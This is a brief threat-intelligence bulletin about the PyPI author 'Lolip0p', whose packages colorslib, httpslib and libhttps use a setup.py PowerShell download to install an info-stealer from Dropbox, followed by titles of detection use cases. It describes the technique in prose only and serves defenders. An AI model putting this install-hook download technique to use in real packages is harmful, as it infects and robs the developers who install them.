PyPI Author 'Lolip0p' Distributes Info-stealing Malware

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Fortinet

Threat actors are continuing to turn to the PyPI (Python Package Index) repository as a distribution source of their malware. Researchers from FortiGuard Labs discovered an author named ‘Lolip0p’ has uploaded three python packages published as early as January 7th, 2023, under project names “colorslib, httpslib and libhttps” to distribute information-stealing malware. "The author also positions each package as legitimate and clean by including a convincing project description. However, these packages download and run a malicious binary executable." The packages when downloaded contain the 'setup.py' script to run a PowerShell invoke-webrequest command to download the malicious executable from DropBox. The executable file proceeds to drop additional payloads and run from the host's TEMP folder. As of January 17th, 2023, vendor detection in VirusTotal for the malicious executable files ranges between 30% and 42%, the detection score for the DropBox link is low with a 9/90 score.

Anvilogic Scenario:

• Malicious Script/Package Installs Malware

Anvilogic Use Cases:

• Package installation
• Access Common Package Config file
• Executable Process from Suspicious Folder

‍